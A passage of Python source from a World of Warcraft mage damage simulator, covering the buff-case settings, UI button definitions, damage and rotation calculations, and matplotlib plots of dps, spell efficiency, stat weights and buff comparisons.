                self.mages[-1].talents[key] = ui[key]
        #load buffs
        # Each of the 5 buff cases becomes a flat dict of its UI settings.
        buff_cases = []
        for i in range(5):
            #merge coe and cos, as in patch 2.4(?)
            ui['buff_case_'+str(i)+'_curse_of_shadow'] = ui['buff_case_'+str(i)+'_curse_of_elements']
            buff_cases.append({})
            buff_case_str = 'buff_case_'+str(i)+'_'
            # Collect every UI entry belonging to this case, coercing to int
            # where possible and keeping the raw value otherwise.
            for key in ui:
                if buff_case_str in key:
                    buff = key.split(buff_case_str)[1]
                    try:
                        buff_cases[i][buff] = int(ui[key])
                    except:
                        buff_cases[i][buff] = ui[key]
            # Expand the armor radio selection into two exclusive flags.
            if buff_cases[i]['armor'] == 'mage armor':
                buff_cases[i]['mage_armor'] = 1
                buff_cases[i]['molten_armor'] = 0
            else:
                buff_cases[i]['mage_armor'] = 0
                buff_cases[i]['molten_armor'] = 1
            #buttons.append({'key': 'buff_case_'+str(k)+'armor', 'type': 'radio:text', 'texts': ['molten armor', 'mage armor']','default': '0', 'tab': 1, 'row': i})
            #buttons.append({'key': 'buff_case_'+str(k)+'_molten_armor', 'type': 'check', 'text': 'molten armor','default': '1', 'tab': 1, 'row': i})
            #buttons.append({'key': 'buff_case_'+str(k)+'_mage_armor', 'type': 'check', 'text': 'mage armor','default': '0', 'tab': 1, 'row': i})
        #plot measurements
        # One linestyle per buff case so cases stay distinguishable per mage.
        linestyles=['-','-.','--',(0, (3, 1, 1, 1, 1, 1)),':']
        # The hidden figure is only used for high-resolution file export.
        self.frame.hidden_figure.set_dpi(300)
        self.frame.hidden_figure.set_size_inches(6,4)
        #self.frame.update()
        #self.frame.figure. canvas.draw()
        if ui['plot_dmg']:
            # Cumulative damage plot (DMG=True) for every enabled buff case.
            ax = fns.add_axis(self.fig,2)
            ax.grid()
            misc = []
            for i, buff_case in enumerate(buff_cases):
                linestyle = linestyles[i]
                if buff_case['check'] == 1:
                    for mage in self.mages:
                        misc = plot_dps(ui, mage, buff_case, i, linestyle, ax, misc, fractions = ui['include_rotation_fractions'], DMG = True)
            if ui['save_check']:
                # Re-render on the hidden figure for file export.
                misc = []
                self.frame.hidden_figure.clf()
                tempax = self.frame.hidden_figure.add_subplot(111)
                tempax.grid()
                for i, buff_case in enumerate(buff_cases):
                    linestyle = linestyles[i]
                    if buff_case['check'] == 1:
                        for mage in self.mages:
                            misc = plot_dps(ui, mage, buff_case, i, linestyle, tempax, misc, fractions = ui['include_rotation_fractions'], DMG = True)
                self.frame.hidden_figure.tight_layout()
                #print(self.frame.tempfig)
                self.frame.hidden_figure.savefig(ui['save_filename']+'/dmg.svg')
                self.frame.hidden_figure.savefig(ui['save_filename']+'/dmg.png')
            #self.frame.update()
            #self.frame.figure.canvas.draw()
        if ui['plot_dps']:
            # Same as above but plotting dps over time (DMG=False).
            ax = fns.add_axis(self.fig,2)
            ax.grid()
            misc = []
            for i, buff_case in enumerate(buff_cases):
                linestyle = linestyles[i]
                if buff_case['check'] == 1:
                    for mage in self.mages:
                        misc = plot_dps(ui, mage, buff_case, i, linestyle, ax, misc, fractions = ui['include_rotation_fractions'], DMG = False)
            if ui['save_check']:
                misc = []
                self.frame.hidden_figure.clf()
                tempax = self.frame.hidden_figure.add_subplot(111)
                tempax.grid()
                for i, buff_case in enumerate(buff_cases):
                    linestyle = linestyles[i]
                    if buff_case['check'] == 1:
                        for mage in self.mages:
                            misc = plot_dps(ui, mage, buff_case, i, linestyle, tempax, misc, fractions = ui['include_rotation_fractions'], DMG = False)
                self.frame.hidden_figure.tight_layout()
                #print(self.frame.tempfig)
                self.frame.hidden_figure.savefig(ui['save_filename']+'/dps.svg')
                self.frame.hidden_figure.savefig(ui['save_filename']+'/dps.png')
            #self.frame.update()
            #self.frame.figure.canvas.draw()
        if ui['plot_compare_buff_states']:
            # Comparing buff states only makes sense with 2+ enabled cases.
            num_buff_cases = 0
            for i, buff_case in enumerate(buff_cases):
                if buff_case['check'] == 1:
                    num_buff_cases+=1
            if num_buff_cases>1:
                ax = fns.add_axis(self.fig,2)
                plot_compare_buff_states(ui, self.mages, buff_cases, linestyles, ax)
                if ui['save_check']:
                    self.frame.hidden_figure.clf()
                    tempax = self.frame.hidden_figure.add_subplot(111)
                    plot_compare_buff_states(ui, self.mages, buff_cases, linestyles, tempax)
                    self.frame.hidden_figure.tight_layout()
                    #print(self.frame.tempfig)
                    self.frame.hidden_figure.savefig(ui['save_filename']+'/comp_buff_states.svg')
                    self.frame.hidden_figure.savefig(ui['save_filename']+'/comp_buff_states.png')
        if ui['plot_compare_mages']:
            # Requires a reference mage previously stored on the frame via
            # the 'set_default_mage' button; silently skipped otherwise.
            if hasattr(self.frame,'default_mage'):
                # Same rotation/talent preprocessing as the loop above.
                default_mage=mage_file(self.frame.default_mage)
                if default_mage.save_rot[0] == 'arcane_frost_clearcasting_optimized':
                    None
                elif default_mage.save_rot[0] == 'fireball_spam_clearcasting_optimized':
                    None
                elif default_mage.save_rot[0] == 'frostbolt_spam_clearcasting_optimized':
                    None
                elif default_mage.save_rot[0] == 'scorch_spam_clearcasting_optimized':
                    None
                else:
                    default_mage.save_rot = parse_rot(default_mage.save_rot)
                if default_mage.burn_rot[0] == 'None':
                    None
                elif default_mage.burn_rot[0] == 'AB_spam_clearcasting_optimized':
                    None
                else:
                    default_mage.burn_rot = parse_rot(default_mage.burn_rot)
                if not hasattr(default_mage,'color'):
                    # NOTE(review): 'i' here is left over from the buff-case
                    # loop above (always 4 after range(5)), not a per-mage
                    # index — confirm the intended color before relying on it.
                    default_mage.color = mage_colors[i%8]
                for key in ['disable_arcane_power', 'disable_icy_veins', 'disable_cold_snap', 'disable_water_elemental', 'disable_combustion', 'disable_PoM_pyro', 'ignore_scorch_ramp']:
                    default_mage.talents[key] = ui[key]
                ax = fns.add_axis(self.fig,2)
                plot_compare_mages(ui, default_mage, self.mages, buff_cases, linestyles, ax)
                if ui['save_check']:
                    self.frame.hidden_figure.clf()
                    tempax = self.frame.hidden_figure.add_subplot(111)
                    plot_compare_mages(ui, default_mage, self.mages, buff_cases, linestyles, tempax)
                    self.frame.hidden_figure.tight_layout()
                    #print(self.frame.tempfig)
                    self.frame.hidden_figure.savefig(ui['save_filename']+'/comp_mages.svg')
                    self.frame.hidden_figure.savefig(ui['save_filename']+'/comp_mages.png')
        if ui['plot_spell_dps']:
            ax = fns.add_axis(self.fig,2)
            plot_spell_dps(ui, self.mages, buff_cases, linestyles, ax)
            if ui['save_check']:
                self.frame.hidden_figure.clf()
                tempax = self.frame.hidden_figure.add_subplot(111)
                plot_spell_dps(ui, self.mages, buff_cases, linestyles, tempax)
                self.frame.hidden_figure.tight_layout()
                #print(self.frame.tempfig)
                self.frame.hidden_figure.savefig(ui['save_filename']+'/spell_dps.svg')
                self.frame.hidden_figure.savefig(ui['save_filename']+'/spell_dps.png')
            #self.frame.figure.canvas.draw()
        if ui['plot_spell_dpm']:
            # Same plotting entry point, damage-per-mana mode.
            ax = fns.add_axis(self.fig,2)
            plot_spell_dps(ui, self.mages, buff_cases, linestyles, ax, DPM= True)
            if ui['save_check']:
                self.frame.hidden_figure.clf()
                tempax = self.frame.hidden_figure.add_subplot(111)
                plot_spell_dps(ui, self.mages, buff_cases, linestyles, tempax, DPM= True)
                self.frame.hidden_figure.tight_layout()
                #print(self.frame.tempfig)
                self.frame.hidden_figure.savefig(ui['save_filename']+'/spell_dpm.svg')
                self.frame.hidden_figure.savefig(ui['save_filename']+'/spell_dpm.png')
            #self.frame.figure.canvas.draw()
        if ui['plot_stat_weights']:
            ax = fns.add_axis(self.fig,2)
            plot_stat_weights(ui, self.mages, buff_cases, linestyles, ax)
            if ui['save_check']:
                self.frame.hidden_figure.clf()
                tempax = self.frame.hidden_figure.add_subplot(111)
                plot_stat_weights(ui, self.mages, buff_cases, linestyles, tempax)
                self.frame.hidden_figure.tight_layout()
                #print(self.frame.tempfig)
                self.frame.hidden_figure.savefig(ui['save_filename']+'/stat_weights.svg')
                self.frame.hidden_figure.savefig(ui['save_filename']+'/stat_weights.png')
        # Dead code from an earlier axis-labelling flow, kept for reference.
        '''
        ax.legend()
        #set x and ylabel
        ax.set_xlabel(ui['XYxlabel'])
        ax.set_xlim([ui['XYxmin'],ui['XYxmax']])
        ax.set_ylabel(ui['XYylabel'])
        '''
        # Finally save the combined on-screen figure and refresh the UI.
        if ui['save_check']:
            self.fig.savefig(ui['save_filename']+'/all.svg')
            self.fig.savefig(ui['save_filename']+'/all.png')
        fig.canvas.draw()
        self.frame.update()
def addButtons():
buttons=[
{'key': 'mage_tab_0_name', 'type': 'tabname', 'text': 'misc', 'tab': 0} ,
{'key': 'mage_tab_1_name', 'type': 'tabname', 'text': 'buffs', 'tab': 1} ,
{'key': 'plot_dmg', 'type': 'check', 'text': 'plot_dmg','default': '1', 'tab': 0, 'row': 0},
{'key': 'plot_dps', 'type': 'check', 'text': 'plot_dps','default': '1', 'tab': 0, 'row': 0},
{'key': 'include_rotation_fractions', 'type': 'check', 'text': 'include rotation fractions','default': '0', 'tab': 0, 'row': 0},
{'key': 'plot_compare_buff_states', 'type': 'check', 'text': 'plot_compare_buff_states','default': '1', 'tab': 0, 'row': 0},
{'key': 'set_default_mage', 'type': 'click', 'text': 'set_default_mage','bind': set_default_mage, 'tab': 0, 'row': 0},
{'key': 'plot_compare_mages', 'type': 'check', 'text': 'plot_compare_mages','default': '1', 'tab': 0, 'row': 0},
#{'key': 'clear_default_mage', 'type': 'click', 'text': 'set_default_mage','bind': clear_default_mage, 'tab': 10, 'row': 0},
{'key': 'plot_spell_dps', 'type': 'check', 'text': 'plot_spell_dps','default': '0', 'tab': 0, 'row': 0},
{'key': 'plot_spell_dpm', 'type': 'check', 'text': 'plot_spell_dpm','default': '0', 'tab': 0, 'row': 0},
{'key': 'plot_stat_weights', 'type': 'check', 'text': 'plot_stat_weights','default': '0', 'tab': 0, 'row': 0},
{'key': 'time_min', 'type': 'txt:float', 'text': 'time_min', 'default': '40', 'width': 4, 'tab': 0, 'row': 1} ,
{'key': 'time_max', 'type': 'txt:float', 'text': 'time_max', 'default': '180', 'width': 4, 'tab': 0, 'row': 1} ,
{'key': 'dps_min', 'type': 'txt:float', 'text': 'dps_min', 'default': '0', 'width': 4, 'tab': 0, 'row': 2} ,
{'key': 'dps_max', 'type': 'txt:float', 'text': 'dps_max', 'default': '2000', 'width': 4, 'tab': 0, 'row': 2} ,
{'key': 'stat_weight_ymax', 'type': 'txt:int', 'text': 'stat_weight_ymax', 'default': '2', 'width': 4, 'tab': 0, 'row': 2} ,
{'key': 'disable_arcane_power', 'type': 'check', 'text': 'disable_arcane_power','default': '0', 'tab': 0, 'row': 3},
{'key': 'disable_icy_veins', 'type': 'check', 'text': 'disable_icy_veins','default': '0', 'tab': 0, 'row': 3},
{'key': 'disable_cold_snap', 'type': 'check', 'text': 'disable_cold_snap','default': '0', 'tab': 0, 'row': 3},
{'key': 'disable_water_elemental', 'type': 'check', 'text': 'disable_water_elemental','default': '0', 'tab': 0, 'row': 3},
{'key': 'disable_combustion', 'type': 'check', 'text': 'disable_combustion','default': '0', 'tab': 0, 'row': 3},
{'key': 'disable_PoM_pyro', 'type': 'check', 'text': 'disable_PoM_pyro','default': '0', 'tab': 0, 'row': 3},
{'key': 'ignore_scorch_ramp', 'type': 'check', 'text': 'ignore_scorch_ramp','default': '0', 'tab': 0, 'row': 3},
]
j = len(buttons)
for k in range(5):
i=k*2
buttons.append({'key': 'buff_case_'+str(k)+'_check', 'type': 'check', 'text': 'Buffs '+str(k),'default': '0', 'tab': 1, 'row': i})
buttons.append({'key': 'buff_case_'+str(k)+'_label', 'type': 'txt', 'text': 'label:','default': 'buffs '+str(k), 'width': 10, 'tab': 1, 'row': i})
buttons.append({'key': 'buff_case_'+str(k)+'_arcane_intellect', 'type': 'check', 'text': 'AI','default': '1', 'tab': 1, 'row': i})
buttons.append({'key': 'buff_case_'+str(k)+'_armor', 'type': 'radio:text', 'texts': ['molten armor', 'mage armor'],'default': '0', 'tab': 1, 'row': i})
#buttons.append({'key': 'buff_case_'+str(k)+'_molten_armor', 'type': 'check', 'text': 'molten armor','default': '1', 'tab': 1, 'row': i})
#buttons.append({'key': 'buff_case_'+str(k)+'_mage_armor', 'type': 'check', 'text': 'mage armor','default': '0', 'tab': 1, 'row': i})
buttons.append({'key': 'buff_case_'+str(k)+'_misc_add_mana', 'type': 'txt:float', 'text': '| misc mana (mana ruby, potions, etc)','default': '2400','width': 5, 'tab': 1, 'row': i})
buttons.append({'key': 'buff_case_'+str(k)+'_innervate', 'type': 'txt:float', 'text': '# of innervates','default': '0','width': 2, 'tab': 1, 'row': i})
buttons.append({'key': 'buff_case_'+str(k)+'_dummy_label', 'type': 'label', 'text': ' ', 'tab': 1, 'row': i+1})
#{'key': 'XYxlabel', 'type': 'txt', 'text': 'x label', 'default': r'$2\theta$', 'width': 10, 'tab': 0, 'row': 1} ,
#buttons.append({'key': 'buff_case_'+str(k)+'_curse_of_shadow', 'type': 'check', 'text': 'CoS','default': '1', 'tab': 1, 'row': i+1})
buttons.append({'key': 'buff_case_'+str(k)+'_curse_of_elements', 'type': 'check', 'text': 'CoE','default': '1', 'tab': 1, 'row': i+1})
buttons.append({'key': 'buff_case_'+str(k)+'_malediction', 'type': 'check', 'text': 'Malediction','default': '1', 'tab': 1, 'row': i+1})
buttons.append({'key': 'buff_case_'+str(k)+'_divine_spirit', 'type': 'check', 'text': 'D.spirit','default': '1', 'tab': 1, 'row': i+1})
buttons.append({'key': 'buff_case_'+str(k)+'_improved_divine_spirit', 'type': 'check', 'text': 'Imp.d.spirit','default': '1', 'tab': 1, 'row': i+1})
buttons.append({'key': 'buff_case_'+str(k)+'_wrath_of_air_totem', 'type': 'check', 'text': 'WoA totem','default': '0', 'tab': 1, 'row': i+1})
buttons.append({'key': 'buff_case_'+str(k)+'_improved_wrath_of_air_totem', 'type': 'check', 'text': 'imp.WoA','default': '0', 'tab': 1, 'row': i+1})
buttons.append({'key': 'buff_case_'+str(k)+'_totem_of_wrath', 'type': 'check', 'text': 'totem of wrath','default': '0', 'tab': 1, 'row': i+1})
buttons.append({'key': 'buff_case_'+str(k)+'_mark_of_the_wild', 'type': 'check', 'text': 'MotW','default': '1', 'tab': 1, 'row': i+1})
buttons.append({'key': 'buff_case_'+str(k)+'_improved_mark_of_the_wild', 'type': 'check', 'text': 'imp.MotW','default': '1', 'tab': 1, 'row': i+1})
buttons.append({'key': 'buff_case_'+str(k)+'_blessing_of_kings', 'type': 'check', 'text': 'BoK','default': '1', 'tab': 1, 'row': i+1})
buttons.append({'key': 'buff_case_'+str(k)+'_blessing_of_wisdom', 'type': 'check', 'text': 'BoW','default': '1', 'tab': 1, 'row': i+1})
buttons.append({'key': 'buff_case_'+str(k)+'_judgement_of_wisdom', 'type': 'check', 'text': 'JoW','default': '1', 'tab': 1, 'row': i+1})
buttons.append({'key': 'buff_case_'+str(k)+'_shadow_priest_dps', 'type': 'txt:float', 'text': 'SP dps', 'default': '0', 'width': 4, 'tab': 1, 'row': i+1})
buttons.append({'key': 'buff_case_'+str(k)+'_misery', 'type': 'check', 'text': 'misery','default': '0', 'tab': 1, 'row': i+1})
buttons.append({'key': 'buff_case_'+str(k)+'_2_tier5_set_bonus', 'type': 'check', 'text': '2_tier5_set_bonus','default': '0', 'tab': 1, 'row': i+1})
buttons.append({'key': 'buff_case_'+str(k)+'_spellfire_set', 'type': 'check', 'text': 'spellfire set','default': '0', 'tab': 1, 'row': i+1})
buttons[j]['default'] = 1
#{'key': 'XYxmin', 'type': 'txt:float', 'text': 'x min', 'default': '0', 'width': 4, 'tab': 0, 'row': 1} ,
#{'key': 'XYxmax', 'type': 'txt:float', 'text': 'x max', 'default': '120', 'width': 4, 'tab': 0, 'row': 1} ,
#{'key': 'XYxlabel', 'type': 'txt', 'text': 'x label', 'default': r'$2\theta$', 'width': 10, 'tab': 0, 'row': 1} ,
#{'key': 'XYnormalize', 'type': 'check', 'text': 'Normalize y-axis', 'tab': 0, 'row': 2} ,
#{'key': 'XYylabel_text', 'type': 'label', 'text': 'ylabel: ', 'tab': 0, 'row': 2} ,
#{'key': 'XYylabel', 'type': 'radio:text', 'texts': ['Counts', 'Intensity'], 'tab': 0, 'row': 2,'default': 0} ,
return buttons
import copy
def _spells_with_and_without_clearcasting(stats_0, talents):
    """Compute spell tables with clearcasting forced off and forced on.

    Temporarily toggles ``talents['force_clearcasting']`` (-1 = never proc,
    1 = always proc) around ``bck.get_spells_stats`` and resets it to 0
    afterwards so later calls see the default behaviour.

    :returns: tuple ``(spells_no_clearcast, spells_forced_clearcast)``
    """
    talents['force_clearcasting'] = -1
    spells_no_c, _ = bck.get_spells_stats(stats_0, talents, bck.game_config)
    talents['force_clearcasting'] = 1
    spells_forced_c, _ = bck.get_spells_stats(stats_0, talents, bck.game_config)
    talents['force_clearcasting'] = 0  # reset
    return spells_no_c, spells_forced_c


def get_dmg(mage, buffs, times):
    """Return total damage and its burn/save/other fractions over ``times``.

    :param mage: mage object with ``stats``, ``talents``, ``save_rot`` and
        ``burn_rot`` attributes; the rotations are lists of spell names, or a
        single special ``'..._clearcasting_optimized'`` keyword.
    :param buffs: buff-case dict applied via ``bck.buff_me``.
    :param times: array of total fight durations [s].
    :returns: ``(dmg, dmg_burn, dmg_save, dmg_other, time_shift)`` as produced
        by ``bck.optimize_cycles_return_damage``.
    """
    # Work on copies: buffing mutates stats/talents and must not leak back
    # into the mage object.
    new_stats_0 = copy.deepcopy(mage.stats)
    new_talents = copy.deepcopy(mage.talents)
    bck.buff_me(new_stats_0, new_talents, buffs)
    spells, new_stats = bck.get_spells_stats(new_stats_0, new_talents, bck.game_config)

    # --- mana-conserving ("save") rotation --------------------------------
    save_key = mage.save_rot[0]
    if save_key == 'arcane_frost_clearcasting_optimized':
        save_rot = bck.get_dps_mps_rot_clearcasting_optimal(
            new_stats_0, new_talents, bck.game_config, spells_to_cast=20000)
    elif save_key == 'fireball_spam_clearcasting_optimized':
        spells_no_c, spells_forced_c = _spells_with_and_without_clearcasting(
            new_stats_0, new_talents)
        optimized_spells = [spells_no_c['fireball_13_one_tick']] * 7
        optimized_spells.append(spells_no_c['fireball_13_one_tick_one_roll'])
        optimized_spells.append(spells_no_c['fireball_13_three_tick_no_roll'])
        optimized_spells.append(spells_forced_c['arcane_missiles_10'])
        save_rot = bck.get_dps_mps_rotation(optimized_spells)
    elif save_key == 'scorch_spam_clearcasting_optimized':
        spells_no_c, spells_forced_c = _spells_with_and_without_clearcasting(
            new_stats_0, new_talents)
        optimized_spells = [spells_no_c['scorch_9']] * 7
        # NOTE(review): 'scorch_9_no_roll' is appended twice here, unlike the
        # fireball branch which uses two distinct variants — kept as in the
        # original, but worth confirming it is intentional.
        optimized_spells.append(spells_no_c['scorch_9_no_roll'])
        optimized_spells.append(spells_no_c['scorch_9_no_roll'])
        optimized_spells.append(spells_forced_c['arcane_missiles_10'])
        save_rot = bck.get_dps_mps_rotation(optimized_spells)
    elif save_key == 'frostbolt_spam_clearcasting_optimized':
        spells_no_c, spells_forced_c = _spells_with_and_without_clearcasting(
            new_stats_0, new_talents)
        optimized_spells = [spells_no_c['frostbolt_13']] * 9
        optimized_spells.append(spells_forced_c['arcane_missiles_10'])
        save_rot = bck.get_dps_mps_rotation(optimized_spells)
    else:
        save_rot = bck.get_dps_mps_rotation([spells[x] for x in mage.save_rot])

    # --- mana-burning ("burn") rotation -----------------------------------
    burn_key = mage.burn_rot[0]
    if burn_key == 'None':
        # No burn phase: zero dps at effectively infinite mana cost.
        burn_rot = [0, 10 ** 10]
    elif burn_key == 'AB_spam_clearcasting_optimized':
        spells_no_c, spells_forced_c = _spells_with_and_without_clearcasting(
            new_stats_0, new_talents)
        optimized_spells = [spells_no_c['arcane_blast_1_3speed_3mana']] * 9
        optimized_spells.append(spells_forced_c['arcane_missiles_10'])
        burn_rot = bck.get_dps_mps_rotation(optimized_spells)
    else:
        burn_rot = bck.get_dps_mps_rotation([spells[x] for x in mage.burn_rot])

    # Replacement rotation used while Icy Veins is active, when applicable.
    IV_replace = None
    if ('arcane_frost_clearcasting_optimized' in mage.save_rot
            or 'arcane_blast_1_3speed_0mana' in mage.save_rot):
        IV_replace = bck.get_dps_mps_rotation([spells['frostbolt_13']])

    dmg, dmg_burn, dmg_save, dmg_other, time_shift = bck.optimize_cycles_return_damage(
        new_stats, times, new_talents, burn_rot, save_rot,
        return_fractions=True, IV_replace=IV_replace)
    return dmg, dmg_burn, dmg_save, dmg_other, time_shift
def plot_dps(ui, mage, buffs, i, linestyle, ax, misc, fractions=False, DMG=False):
    """Plot total damage (or average dps) vs fight length for one mage/buff case.

    :param ui: dict of UI settings (time/dps limits, buff-case labels).
    :param mage: mage object (stats, talents, rotations, ``color``, ``label``).
    :param buffs: buff case forwarded to :func:`get_dmg`.
    :param i: buff-case index, used to look up the legend label in ``ui``.
    :param linestyle: matplotlib linestyle for this buff case.
    :param ax: matplotlib axes to draw on.
    :param misc: list of already-emitted legend keys; mutated and returned so
        that repeated calls add each area-fill label only once.
    :param fractions: when True, shade the save/burn (and "other") damage
        fractions as stacked areas.
    :param DMG: when True plot raw damage; otherwise average dps (damage/time).
    :returns: the (possibly extended) ``misc`` list.
    """
    times = np.arange(ui['time_min'], ui['time_max'] + 1, 1)
    dmg, dmg_burn, dmg_save, dmg_other, time_shift = get_dmg(mage, buffs, times)
    if DMG:
        times_mod = 1  # leave damage unscaled
        ax.set_ylabel('Damage [DMG]')
    else:
        times_mod = times  # convert cumulative damage to average dps
        ax.set_ylabel('Average dps [DMG/s]')
        ax.set_ylim([ui['dps_min'], ui['dps_max']])
    if fractions:
        # Label each shaded region only once across calls (tracked via misc),
        # otherwise the legend repeats entries.  matplotlib adds no legend
        # entry for label=None, so the unlabeled path reuses the same calls.
        if 'dmg_frac_label' not in misc:
            misc.append('dmg_frac_label')
            save_label, burn_label = 'save', 'burn'
        else:
            save_label = burn_label = None
        ax.fill_between(times,
                        np.zeros(len(times)),
                        dmg_save / times_mod,
                        color=[0.5, 0, 1, 0.2], label=save_label)
        ax.fill_between(times,
                        dmg_save / times_mod,
                        (dmg_save + dmg_burn) / times_mod,
                        color=[1, 0, 0.5, 0.2], label=burn_label)
        # "Other" damage (PoM+pyro etc.) is only shaded when non-negligible.
        if np.sum(dmg_other) > 1000:
            if 'dmg_frac_other_label' not in misc:
                misc.append('dmg_frac_other_label')
                other_label = 'other (pom+pyro, etc)'
            else:
                other_label = None
            ax.fill_between(times,
                            (dmg_save + dmg_burn) / times_mod,
                            (dmg_save + dmg_burn + dmg_other) / times_mod,
                            color=[0, 0, 0, 0.2], label=other_label)
    ax.plot(times, dmg / times_mod, linestyle=linestyle, color=mage.color,
            label=mage.label + ', ' + ui['buff_case_' + str(i) + '_label'])
    # Ticks every 30 s starting at the first multiple of 30 inside the range.
    ax.set_xticks(ticks=np.arange((int((times[0] - 1) / 30) + 1) * 30, times[-1] + 1, 30))
    ax.set_xlabel('Total casting time before boss dead [s]')
    ax.legend()
    ax.set_xlim([ui['time_min'], ui['time_max']])
    ylim = ax.get_ylim()
    if ylim[0] < 0:
        ax.set_ylim([0, ylim[1]])  # never show negative dps
    return misc
def plot_spell_dps(ui, mages, buff_cases, linestyles, ax, DPM=False):
    """Bar-plot per-spell dps (or dpm) for every mage under each checked buff case.

    :param ui: dict of UI settings (unused here, kept for a uniform signature).
    :param mages: iterable of mage objects (stats, talents, ``color``, ``label``).
    :param buff_cases: list of buff-case dicts; only those with ``check == 1``
        are plotted.
    :param linestyles: per-buff-case matplotlib linestyles.
    :param ax: matplotlib axes to draw on.
    :param DPM: plot damage-per-mana instead of damage-per-second.
    """
    spell_names = ['frostbolt_13', 'fireball_13_one_tick',
                   'scorch_9',
                   'arcane_blast_1_0speed_0mana',
                   'arcane_blast_1_1speed_1mana',
                   'arcane_blast_1_2speed_2mana',
                   'arcane_blast_1_3speed_3mana',
                   'arcane_blast_1_3speed_0mana',
                   'arcane_missiles_10',
                   ]
    x = np.arange(len(spell_names))
    # One bar per (checked buff case, mage) combination within each spell group.
    tot_cases = sum(len(mages) for buff_case in buff_cases if buff_case['check'] == 1)
    if tot_cases == 0:
        # Fix: with no checked buff case the original raised ZeroDivisionError
        # computing the bar width; there is nothing to draw, so return.
        return
    width = 0.8 / tot_cases
    j = 0
    for i, buff_case in enumerate(buff_cases):
        linestyle = linestyles[i]
        if buff_case['check'] != 1:
            continue
        for mage in mages:
            # Buff a private copy so the mage object is not mutated.
            new_stats_0 = copy.deepcopy(mage.stats)
            new_talents = copy.deepcopy(mage.talents)
            bck.buff_me(new_stats_0, new_talents, buff_case)
            spells, new_stats = bck.get_spells_stats(new_stats_0, new_talents, bck.game_config)
            dpss = [spells[s].average_damage / spells[s].actual_cast_time
                    for s in spell_names]
            dpms = [spells[s].average_damage / spells[s].actual_mana
                    for s in spell_names]
            # Spread this combination's bars across the 0.8-wide group.
            offset = -0.8 / 2 + (j + 0.5) * 0.8 / tot_cases
            color = [mage.color[0], mage.color[1], mage.color[2], 0.5]
            edgecolor = [mage.color[0], mage.color[1], mage.color[2], 1]
            ax.bar(x + offset, dpms if DPM else dpss, width, linestyle=linestyle,
                   edgecolor=edgecolor, color=color, label=mage.label)
            j += 1
    ax.set_ylabel('spell dpm' if DPM else 'spell dps')
    spell_names_short = ['Frostbolt',
                         'Fireball',
                         'Scorch',
                         'AB0',
                         'AB1',
                         'AB2',
                         'AB3',
                         'AB3\ncost1',
                         'AM',
                         ]
    ax.set_xticks(np.arange(0, len(spell_names_short), 1))
    ax.set_xticklabels(spell_names_short)
    return
def plot_stat_weights(ui, mages, buff_cases, linestyles, ax, DPM=False):
    """Draw per-stat dps weights in a 4x2 panel grid on a single axes.

    For every checked buff case and mage, each stat is perturbed by -10,
    the dps change is converted into a "stat weight" curve over fight
    length, and the curve is drawn in its own sub-panel (panels are faked
    by shifting curves with x/y offsets on one axes).
    """
    stats_list = ['intellect', 'common_spell_damage',
                  'crit_rating', 'hit_rating', 'haste_rating', 'mp5', 'spirit']
    stats_names = ['Intellect', '+Spelldamage', 'Crit rating',
                   'Hit rating', 'Haste', 'mp5', 'Spirit']
    x_step = ui['time_max'] - ui['time_min']
    xlim = [ui['time_min'], ui['time_max'] + 3 * x_step]
    times = np.arange(ui['time_min'], ui['time_max'] + 1, 1)
    max_ylim = ui['stat_weight_ymax']
    for case_idx, buff_case in enumerate(buff_cases):
        linestyle = linestyles[case_idx]
        if buff_case['check'] != 1:
            continue
        for mage in mages:
            # Baseline dps for this mage under this buff case.
            dps_0 = get_dmg(mage, buff_case, times)[0] / times
            xo = -x_step
            yo = max_ylim
            for stat_idx, stat in enumerate(stats_list):
                # Panel layout: 4 columns, wrap to the lower row at index 4.
                if stat_idx == 4:
                    xo = 0
                    yo -= max_ylim
                else:
                    xo += x_step
                # Perturb the stat by -10, measure dps, then restore it.
                mage.stats[stat] -= 10
                dps_new = get_dmg(mage, buff_case, times)[0] / times
                mage.stats[stat] += 10
                fraction_increase_per_stat = -0.1 * (dps_new / dps_0 - 1)
                stat_per_percent = 0.01 / fraction_increase_per_stat
                y = 20 / stat_per_percent
                # Hide negative or off-scale values instead of plotting them.
                y[y < -0.0001] = np.nan
                y[y > max_ylim] = np.nan
                ax.plot(times + xo, y + yo, linestyle=linestyle, color=mage.color)
    # Panel titles, placed with the same offset walk as the curves above.
    xo = -x_step
    yo = max_ylim
    for stat_idx, stat in enumerate(stats_list):
        if stat_idx == 4:
            xo = 0
            yo -= max_ylim
        else:
            xo += x_step
        ax.text(xo + xlim[0] + 0.05 * x_step, yo + max_ylim - 0.05 * max_ylim,
                stats_names[stat_idx], ha='left', va='top')
    ax.set_xlim(xlim)
    ax.set_ylim([0, 2 * max_ylim])
    ax.set_xticks([])
    # y ticks repeat modulo max_ylim so both fake rows read the same scale.
    ax.set_yticks(np.arange(max_ylim * 4) / 2)
    ax.set_yticklabels(np.arange(max_ylim * 4) / 2 % max_ylim)
    # Horizontal separator between the two panel rows.
    ax.plot(xlim, [max_ylim, max_ylim], lw=0.5, color=[0, 0, 0, 1])
    ax.grid()
    # Vertical separators between the four panel columns.
    for col in range(1, 4):
        ax.plot([xlim[0] + x_step * col] * 2, [0, max_ylim * 2], lw=0.5, color=[0, 0, 0, 1])
    # x ticks: the same 30 s grid replicated into each of the four columns,
    # labelled with the unshifted times.
    x_ticks_0 = np.arange((int((times[0] - 1) / 30) + 1) * 30, times[-1], 30)
    ax.set_xticks(ticks=[t + col * x_step for col in range(4) for t in x_ticks_0])
    ax.set_xticklabels([int(t) for _ in range(4) for t in x_ticks_0])
    ax.set_xlabel('Total casting time before boss dead [s]')
    ax.set_ylabel('Stat weight [-]')
def plot_compare_buff_states(ui, mages, buff_cases, linestyles, ax):
    """Plot each checked buff case's % dps gain relative to the first checked case.

    For every mage, the first checked buff case becomes the baseline (drawn
    as the horizontal zero line); every further checked case is plotted as a
    percentage dps increase over that baseline.

    :param ui: dict of UI settings (time limits, buff-case labels).
    :param mages: iterable of mage objects.
    :param buff_cases: list of buff-case dicts; only ``check == 1`` is used.
    :param linestyles: per-buff-case matplotlib linestyles.
    :param ax: matplotlib axes to draw on.
    """
    times = np.arange(ui['time_min'], ui['time_max'] + 1, 1)
    ax.plot(times, np.zeros(times.shape), color=[0, 0, 0, 1])  # baseline at 0 %
    label_0 = None
    for mage in mages:
        dps_0 = None  # this mage's baseline dps (first checked buff case)
        for i, buff_case in enumerate(buff_cases):
            if buff_case['check'] != 1:
                continue
            dps = get_dmg(mage, buff_case, times)[0] / times
            if dps_0 is None:
                dps_0 = dps
                label_0 = ui['buff_case_' + str(i) + '_label']
            else:
